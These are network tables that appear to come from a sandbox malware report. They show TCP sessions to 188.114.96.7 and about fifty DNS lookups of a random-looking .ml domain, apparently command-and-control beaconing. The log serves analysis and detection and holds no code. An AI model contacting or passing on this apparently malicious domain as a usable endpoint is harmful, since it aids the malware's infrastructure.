Jun 9, 2022 12:20:27.373344898 CEST	49844	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:27.377021074 CEST	49844	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:27.393747091 CEST	80	49844	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:27.393836975 CEST	49844	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:27.410582066 CEST	80	49844	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:27.494107008 CEST	80	49844	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:27.494256020 CEST	49844	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:27.494360924 CEST	80	49844	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:27.494412899 CEST	49844	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:27.511152983 CEST	80	49844	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:29.307107925 CEST	49851	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:29.323877096 CEST	80	49851	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:29.324093103 CEST	49851	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:29.327641010 CEST	49851	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:29.344423056 CEST	80	49851	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:29.346561909 CEST	49851	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:29.363325119 CEST	80	49851	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:29.443782091 CEST	80	49851	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:29.444286108 CEST	49851	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:29.444533110 CEST	80	49851	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:29.444591999 CEST	49851	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:29.461112976 CEST	80	49851	188.114.96.7	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 9, 2022 12:18:46.320662975 CEST	55923	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:18:46.654654026 CEST	53	55923	8.8.8.8	192.168.2.3
Jun 9, 2022 12:18:49.792571068 CEST	57723	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:18:50.125027895 CEST	53	57723	8.8.8.8	192.168.2.3
Jun 9, 2022 12:18:52.732420921 CEST	57421	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:18:53.071388960 CEST	53	57421	8.8.8.8	192.168.2.3
Jun 9, 2022 12:18:54.779560089 CEST	65358	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:18:54.799858093 CEST	53	65358	8.8.8.8	192.168.2.3
Jun 9, 2022 12:18:59.222264051 CEST	53802	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:18:59.558743000 CEST	53	53802	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:02.150631905 CEST	63548	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:02.171612024 CEST	53	63548	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:04.390835047 CEST	49327	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:04.723588943 CEST	53	49327	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:06.908921003 CEST	51391	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:06.937489986 CEST	53	51391	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:08.748076916 CEST	58981	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:08.768929958 CEST	53	58981	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:10.330476999 CEST	64452	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:10.359749079 CEST	53	64452	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:11.511810064 CEST	61380	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:11.540854931 CEST	53	61380	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:13.989813089 CEST	63146	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:14.018810987 CEST	53	63146	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:17.191728115 CEST	52985	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:17.213033915 CEST	53	52985	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:18.413028955 CEST	58625	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:18.441941023 CEST	53	58625	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:20.001535892 CEST	52810	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:20.022313118 CEST	53	52810	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:21.429740906 CEST	50778	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:21.450298071 CEST	53	50778	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:22.543773890 CEST	55151	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:22.572666883 CEST	53	55151	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:23.907179117 CEST	59795	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:23.927850008 CEST	53	59795	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:25.131369114 CEST	59390	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:25.160787106 CEST	53	59390	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:26.673069954 CEST	64816	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:26.702125072 CEST	53	64816	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:27.965425968 CEST	64996	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:27.985680103 CEST	53	64996	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:30.728729963 CEST	52096	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:30.757725954 CEST	53	52096	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:36.213679075 CEST	60640	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:36.243210077 CEST	53	60640	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:38.952038050 CEST	49844	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:38.981350899 CEST	53	49844	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:42.560014009 CEST	63861	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:42.580615997 CEST	53	63861	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:44.318942070 CEST	51518	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:44.334171057 CEST	53	51518	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:45.814466000 CEST	52581	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:45.835082054 CEST	53	52581	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:50.471400023 CEST	50152	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:50.486875057 CEST	53	50152	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:52.678580999 CEST	56639	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:52.699559927 CEST	53	56639	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:54.802884102 CEST	50450	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:54.832241058 CEST	53	50450	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:56.552596092 CEST	52427	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:56.576721907 CEST	53	52427	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:57.959706068 CEST	62724	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:57.980577946 CEST	53	62724	8.8.8.8	192.168.2.3
Jun 9, 2022 12:19:59.305026054 CEST	64941	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:19:59.334050894 CEST	53	64941	8.8.8.8	192.168.2.3
Jun 9, 2022 12:20:00.732938051 CEST	55403	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:20:00.753479958 CEST	53	55403	8.8.8.8	192.168.2.3
Jun 9, 2022 12:20:02.290066957 CEST	54960	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:20:02.319335938 CEST	53	54960	8.8.8.8	192.168.2.3
Jun 9, 2022 12:20:04.004287004 CEST	61877	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:20:04.028419971 CEST	53	61877	8.8.8.8	192.168.2.3
Jun 9, 2022 12:20:05.426645041 CEST	64624	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:20:05.442060947 CEST	53	64624	8.8.8.8	192.168.2.3
Jun 9, 2022 12:20:07.413156033 CEST	64412	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:20:07.436849117 CEST	53	64412	8.8.8.8	192.168.2.3
Jun 9, 2022 12:20:10.561003923 CEST	51779	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:20:10.576389074 CEST	53	51779	8.8.8.8	192.168.2.3
Jun 9, 2022 12:20:13.265501976 CEST	50608	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:20:13.294228077 CEST	53	50608	8.8.8.8	192.168.2.3
Jun 9, 2022 12:20:16.198606968 CEST	62756	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:20:16.227924109 CEST	53	62756	8.8.8.8	192.168.2.3
Jun 9, 2022 12:20:18.146718025 CEST	58497	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:20:18.170475960 CEST	53	58497	8.8.8.8	192.168.2.3
Jun 9, 2022 12:20:19.424609900 CEST	62701	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:20:19.444677114 CEST	53	62701	8.8.8.8	192.168.2.3
Jun 9, 2022 12:20:20.821300030 CEST	53524	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:20:20.845380068 CEST	53	53524	8.8.8.8	192.168.2.3
Jun 9, 2022 12:20:22.610430956 CEST	61555	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:20:22.631125927 CEST	53	61555	8.8.8.8	192.168.2.3
Jun 9, 2022 12:20:23.934340954 CEST	62547	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:20:23.955482960 CEST	53	62547	8.8.8.8	192.168.2.3
Jun 9, 2022 12:20:25.155899048 CEST	57829	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:20:25.184815884 CEST	53	57829	8.8.8.8	192.168.2.3
Jun 9, 2022 12:20:27.339462042 CEST	57442	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:20:27.354715109 CEST	53	57442	8.8.8.8	192.168.2.3
Jun 9, 2022 12:20:29.285346031 CEST	51994	53	192.168.2.3	8.8.8.8
Jun 9, 2022 12:20:29.305778027 CEST	53	51994	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 9, 2022 12:18:46.320662975 CEST	192.168.2.3	8.8.8.8	0x63fb	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:18:49.792571068 CEST	192.168.2.3	8.8.8.8	0x3b2d	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:18:52.732420921 CEST	192.168.2.3	8.8.8.8	0xdbee	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:18:54.779560089 CEST	192.168.2.3	8.8.8.8	0x9ef	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:18:59.222264051 CEST	192.168.2.3	8.8.8.8	0x9fff	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:02.150631905 CEST	192.168.2.3	8.8.8.8	0x18e8	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:04.390835047 CEST	192.168.2.3	8.8.8.8	0x9a4a	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:06.908921003 CEST	192.168.2.3	8.8.8.8	0x1441	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:08.748076916 CEST	192.168.2.3	8.8.8.8	0xd355	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:10.330476999 CEST	192.168.2.3	8.8.8.8	0x979	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:11.511810064 CEST	192.168.2.3	8.8.8.8	0x6953	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:13.989813089 CEST	192.168.2.3	8.8.8.8	0xa08e	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:17.191728115 CEST	192.168.2.3	8.8.8.8	0x918c	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:18.413028955 CEST	192.168.2.3	8.8.8.8	0xf6c6	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:20.001535892 CEST	192.168.2.3	8.8.8.8	0x6115	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:21.429740906 CEST	192.168.2.3	8.8.8.8	0x61a9	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:22.543773890 CEST	192.168.2.3	8.8.8.8	0x34fd	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:23.907179117 CEST	192.168.2.3	8.8.8.8	0x51b0	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:25.131369114 CEST	192.168.2.3	8.8.8.8	0x118e	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:26.673069954 CEST	192.168.2.3	8.8.8.8	0x8244	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:27.965425968 CEST	192.168.2.3	8.8.8.8	0x304c	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:30.728729963 CEST	192.168.2.3	8.8.8.8	0x5289	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:36.213679075 CEST	192.168.2.3	8.8.8.8	0xa975	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:38.952038050 CEST	192.168.2.3	8.8.8.8	0xc035	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:42.560014009 CEST	192.168.2.3	8.8.8.8	0xd816	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:44.318942070 CEST	192.168.2.3	8.8.8.8	0x25ec	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:45.814466000 CEST	192.168.2.3	8.8.8.8	0x2e8b	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:50.471400023 CEST	192.168.2.3	8.8.8.8	0x8aeb	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:52.678580999 CEST	192.168.2.3	8.8.8.8	0x223e	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:54.802884102 CEST	192.168.2.3	8.8.8.8	0xcec8	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:56.552596092 CEST	192.168.2.3	8.8.8.8	0x2bf0	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:57.959706068 CEST	192.168.2.3	8.8.8.8	0x5e55	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:59.305026054 CEST	192.168.2.3	8.8.8.8	0xe373	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:00.732938051 CEST	192.168.2.3	8.8.8.8	0x4d36	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:02.290066957 CEST	192.168.2.3	8.8.8.8	0x20cd	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:04.004287004 CEST	192.168.2.3	8.8.8.8	0xa367	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:05.426645041 CEST	192.168.2.3	8.8.8.8	0x4af5	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:07.413156033 CEST	192.168.2.3	8.8.8.8	0xc229	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:10.561003923 CEST	192.168.2.3	8.8.8.8	0xbe0	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:13.265501976 CEST	192.168.2.3	8.8.8.8	0x96e4	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:16.198606968 CEST	192.168.2.3	8.8.8.8	0x3b2f	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:18.146718025 CEST	192.168.2.3	8.8.8.8	0x9deb	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:19.424609900 CEST	192.168.2.3	8.8.8.8	0x63e	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:20.821300030 CEST	192.168.2.3	8.8.8.8	0xc81a	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:22.610430956 CEST	192.168.2.3	8.8.8.8	0xd04d	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:23.934340954 CEST	192.168.2.3	8.8.8.8	0x5a2e	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:25.155899048 CEST	192.168.2.3	8.8.8.8	0xbeb6	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:27.339462042 CEST	192.168.2.3	8.8.8.8	0x751b	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:29.285346031 CEST	192.168.2.3	8.8.8.8	0xd85e	Standard query (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jun 9, 2022 12:18:46.654654026 CEST	8.8.8.8	192.168.2.3	0x63fb	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:18:46.654654026 CEST	8.8.8.8	192.168.2.3	0x63fb	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:18:50.125027895 CEST	8.8.8.8	192.168.2.3	0x3b2d	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:18:50.125027895 CEST	8.8.8.8	192.168.2.3	0x3b2d	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:18:53.071388960 CEST	8.8.8.8	192.168.2.3	0xdbee	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.6	A (IP address)	IN (0x0001)
Jun 9, 2022 12:18:53.071388960 CEST	8.8.8.8	192.168.2.3	0xdbee	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.6	A (IP address)	IN (0x0001)
Jun 9, 2022 12:18:54.799858093 CEST	8.8.8.8	192.168.2.3	0x9ef	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:18:54.799858093 CEST	8.8.8.8	192.168.2.3	0x9ef	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:18:59.558743000 CEST	8.8.8.8	192.168.2.3	0x9fff	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:18:59.558743000 CEST	8.8.8.8	192.168.2.3	0x9fff	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:02.171612024 CEST	8.8.8.8	192.168.2.3	0x18e8	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.6	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:02.171612024 CEST	8.8.8.8	192.168.2.3	0x18e8	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.6	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:04.723588943 CEST	8.8.8.8	192.168.2.3	0x9a4a	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:04.723588943 CEST	8.8.8.8	192.168.2.3	0x9a4a	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:06.937489986 CEST	8.8.8.8	192.168.2.3	0x1441	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:06.937489986 CEST	8.8.8.8	192.168.2.3	0x1441	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:08.768929958 CEST	8.8.8.8	192.168.2.3	0xd355	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:08.768929958 CEST	8.8.8.8	192.168.2.3	0xd355	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:10.359749079 CEST	8.8.8.8	192.168.2.3	0x979	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.6	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:10.359749079 CEST	8.8.8.8	192.168.2.3	0x979	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.6	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:11.540854931 CEST	8.8.8.8	192.168.2.3	0x6953	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:11.540854931 CEST	8.8.8.8	192.168.2.3	0x6953	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:14.018810987 CEST	8.8.8.8	192.168.2.3	0xa08e	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:14.018810987 CEST	8.8.8.8	192.168.2.3	0xa08e	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:17.213033915 CEST	8.8.8.8	192.168.2.3	0x918c	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.6	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:17.213033915 CEST	8.8.8.8	192.168.2.3	0x918c	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.6	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:18.441941023 CEST	8.8.8.8	192.168.2.3	0xf6c6	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:18.441941023 CEST	8.8.8.8	192.168.2.3	0xf6c6	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:20.022313118 CEST	8.8.8.8	192.168.2.3	0x6115	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:20.022313118 CEST	8.8.8.8	192.168.2.3	0x6115	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:21.450298071 CEST	8.8.8.8	192.168.2.3	0x61a9	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:21.450298071 CEST	8.8.8.8	192.168.2.3	0x61a9	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:22.572666883 CEST	8.8.8.8	192.168.2.3	0x34fd	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.6	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:22.572666883 CEST	8.8.8.8	192.168.2.3	0x34fd	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.6	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:23.927850008 CEST	8.8.8.8	192.168.2.3	0x51b0	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.6	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:23.927850008 CEST	8.8.8.8	192.168.2.3	0x51b0	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.6	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:25.160787106 CEST	8.8.8.8	192.168.2.3	0x118e	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:25.160787106 CEST	8.8.8.8	192.168.2.3	0x118e	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:26.702125072 CEST	8.8.8.8	192.168.2.3	0x8244	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.6	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:26.702125072 CEST	8.8.8.8	192.168.2.3	0x8244	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.6	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:27.985680103 CEST	8.8.8.8	192.168.2.3	0x304c	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:27.985680103 CEST	8.8.8.8	192.168.2.3	0x304c	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:30.757725954 CEST	8.8.8.8	192.168.2.3	0x5289	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
